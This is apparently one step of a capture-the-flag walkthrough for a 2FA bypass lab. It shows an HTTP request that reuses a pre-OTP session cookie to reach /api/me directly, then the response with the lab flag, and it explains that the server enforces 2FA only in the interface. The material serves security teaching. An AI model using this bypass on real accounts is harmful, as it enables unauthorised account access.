Use the pre-2FA session cookie to access /api/me directly, bypassing the OTP screen entirely. If the server doesn't validate OTP completion, you get access.
Command / Input
GET /api/me
Cookie: session=abc123
Output
{"user":"alice","flag":"HackrGG{2f4_byp4ss_st3p_sk1pp3d}"}
⚑ The server grants access with an incomplete 2FA session — the step is enforced only in the UI.